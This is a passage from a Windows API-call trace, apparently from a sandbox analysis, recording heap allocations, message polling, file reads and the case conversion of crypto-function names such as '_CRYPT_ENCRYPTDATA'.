0x90af98 [0164.922] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0164.922] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0164.922] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0164.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0164.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0164.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0164.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0164.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0164.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0164.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0164.923] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0164.923] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x53cf, lpOverlapped=0x0) returned 1 [0164.926] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0164.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0164.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0164.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x53cf) returned 0x900460 [0164.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0164.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0164.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0164.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0164.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x53cf) returned 0x9e5190 [0164.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900460 | out: hHeap=0x8a0000) returned 1 [0164.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.927] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0164.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0164.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x53cf) returned 0x900460 [0164.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900460 | out: hHeap=0x8a0000) returned 1 [0164.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0164.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.928] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0164.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0164.928] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.928] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0164.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0164.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0164.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0164.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x53cf) returned 0x900460 [0164.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0164.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0164.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0164.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x53cf) returned 0x9ea568 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0164.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0164.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0164.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0164.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0164.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0164.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0164.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0164.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0164.931] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0164.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0164.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0164.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0164.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0164.932] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0164.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0164.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0164.933] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0164.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0164.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0164.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0164.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0164.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0164.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0164.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0164.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0164.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0164.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0164.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.934] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0164.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0164.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0164.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0164.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0164.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0164.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0164.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0164.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0164.935] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0164.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0164.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0164.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.936] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0164.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0164.936] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0164.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0164.936] HeapFree 